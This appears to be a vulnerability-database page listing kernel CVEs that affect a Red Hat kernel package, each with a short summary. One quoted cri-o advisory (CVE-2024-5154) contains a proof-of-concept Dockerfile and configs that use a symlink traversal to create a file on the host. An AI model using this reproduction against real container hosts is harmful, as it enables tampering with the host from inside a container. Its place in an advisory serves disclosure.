Search for packages
| purl | pkg:rpm/redhat/kernel@5.14.0-427.24.1?arch=el9_4 |
| Next non-vulnerable version | None. |
| Latest non-vulnerable version | None. |
| Risk | 4.0 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-29y6-m14b-1bhs
Aliases: CVE-2024-26974 |
kernel: crypto: qat - resolve race condition during AER recovery | There are no reported fixed by versions. |
|
VCID-ayru-t6ft-d7er
Aliases: CVE-2024-27393 |
Linux/xen-netfront: Memory leak due to missing cleanup function | There are no reported fixed by versions. |
|
VCID-bk34-68fb-sfaw
Aliases: CVE-2024-35960 |
kernel: net/mlx5: Properly link new fs rules into the tree | There are no reported fixed by versions. |
|
VCID-d6th-8p9s-j7h7
Aliases: CVE-2023-52667 |
kernel: net/mlx5e: fix a potential double-free in fs_any_create_groups | There are no reported fixed by versions. |
|
VCID-d8nf-ph6v-e3fk
Aliases: CVE-2023-52626 |
kernel: net/mlx5e: Fix operation precedence bug in port timestamping napi_poll context | There are no reported fixed by versions. |
|
VCID-eg2n-7z1u-tkfw
Aliases: CVE-2021-47400 |
kernel: net: hns3: do not allow call hns3_nic_net_open repeatedly | There are no reported fixed by versions. |
|
VCID-gznz-vtdh-ryfb
Aliases: CVE-2024-26801 |
kernel: Bluetooth: Avoid potential use-after-free in hci_error_reset | There are no reported fixed by versions. |
|
VCID-khm9-52xa-t3ek
Aliases: CVE-2024-5154 GHSA-j9hf-98c3-wrm8 |
malicious container creates symlink "mtab" on the host External ### Impact A malicious container can affect the host by taking advantage of code cri-o added to show the container mounts on the host. A workload built from this Dockerfile: ``` FROM docker.io/library/busybox as source RUN mkdir /extra && cd /extra && ln -s ../../../../../../../../root etc FROM scratch COPY --from=source /bin /bin COPY --from=source /lib /lib COPY --from=source /extra . ``` and this container config: ``` { "metadata": { "name": "busybox" }, "image":{ "image": "localhost/test" }, "command": [ "/bin/true" ], "linux": { } } ``` and this sandbox config ``` { "metadata": { "name": "test-sandbox", "namespace": "default", "attempt": 1, "uid": "edishd83djaideaduwk28bcsb" }, "linux": { "security_context": { "namespace_options": { "network": 2 } } } } ``` will create a file on host `/host/mtab` ### Patches 1.30.1, 1.29.5, 1.28.7 ### Workarounds Unfortunately not ### References _Are there any links users can visit to find out more?_ | There are no reported fixed by versions. |
|
VCID-w75k-uv9m-kuhm
Aliases: CVE-2024-35870 |
kernel: smb: client: fix UAF in smb2_reconnect_server() | There are no reported fixed by versions. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||